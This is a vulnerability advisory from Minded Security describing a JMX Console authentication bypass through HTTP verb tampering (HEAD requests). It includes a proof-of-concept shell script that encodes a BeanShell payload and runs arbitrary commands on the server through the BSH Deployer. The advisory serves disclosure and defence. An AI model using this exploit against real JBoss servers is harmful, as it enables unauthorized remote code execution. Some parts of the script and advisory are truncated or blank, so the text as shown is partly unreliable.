JMX Console Authentication Bypass via Verb Tampering

Tested Versions:

JMX Console – All Versions

Tested OS:

Linux, Solaris, Windows

Minded Security ReferenceID:



Discovered by
Stefano Di Paola of Minded Security
stefano.dipaola [_at_]

Contribution in Exploitation:

Giorgio Fedon of Minded Security
giorgio.fedon [_at_]



High: Jmx Console is often exposed to the internet or reachable by abusing
other vulnerabilities. This issue can lead to remote host compromise.


A solution to this issue is already available.
See the following RedHat advisories:


Minded Security Consultants discovered during a penetration testing activity that JMX Console authentication can be bypassed.
This issue will lead to remote code execution if BSH deployer or other administrative modules are available in the console panel.


JMX Console can be secured (protected by password) using the security configuration available in:


This is the suggested security configuration also available in Jboss official security guidelines (“White Paper on JMX Security”):

The suggested configuration for protecting the JMX Console is the following one:

<description>An example security config that only allows users with
the role JBossAdmin to access the HTML JMX console web application

From the configuration above, security restrictions are enabled only for “GET” and “POST” methods. Any other HTTP method supported by the server will be not restricted.

By issuing a request with the “HEAD” method is possible to invoke directly, with “JBossAdmin” privilege, any functionality implemented by the jmx-console without valid credentials. Note: If JMX console replies with a HTTP 500 error the request has been correctly processed.

The following proof of concept (“”) was written by Minded Security consultants to execute arbitrary commands on the remote host through the “BSH Deployer” component of the JMX Console.
The command output gets redirected temporarily on JBOSS server status for a couple of seconds.

Remote “” Proof of Concept
Note: The following script should be modifies to meet your environment configuration

COM_=`php -r '$arg=$argv[1];for($i=0;$i<strlen($arg);$i++) {printf("%%%02x",ord($arg[$i]));}echo "\n";' 'import*;
String[] s=new String[] {"/bin/sh","-c","'"$AA"'"};
Process p = Runtime.getRuntime().exec(s);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String e=dis.readLine();
String message=e;
e= dis.readLine();
String mess = message.replaceAll(" ","+").replaceAll("#","%23");
URL u = new URL("http://jbossserver:8080/jmx-console/HtmlAdaptor?ac...;
HttpURLConnection con = (HttpURLConnection) u.openConnection ();
con.setRequestProperty("Cookie","MODIFY ME IF NEEDED");
curl -s "$HOSTPATH/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aservice%3DBSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=$COM_&argType=java.lang.String&arg1=soap" -g -X HEAD -H "Cookie:MODIFY ME IF NEEDED" &
sleep 1
curl "$HOSTPATH/status?full=true" -s -g -H "Cookie:MODIFY ME IF NEEDED" | grep 'null|.*|null' -o|perl -i -pe 's/\|/\n/g'
Disclosure Timeline

03/04/2009 Issue found
06/03/2010 Reported to Vendor


The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information.

In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

Any use of this information is at the user’s own risk. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of Minded Security Research Lab. If you wish to reprint the whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail for permission.


Implement the right DevSecOps automation and Continuous Web Application Scanning for your needs.

consulting minded security


We are a Consultancy Company focused in supporting Companies to develop secure products.

testing minded security


We performs software security analysis in white box mode and black box mode.

training minded security


Training and awareness in software security is critical for information security.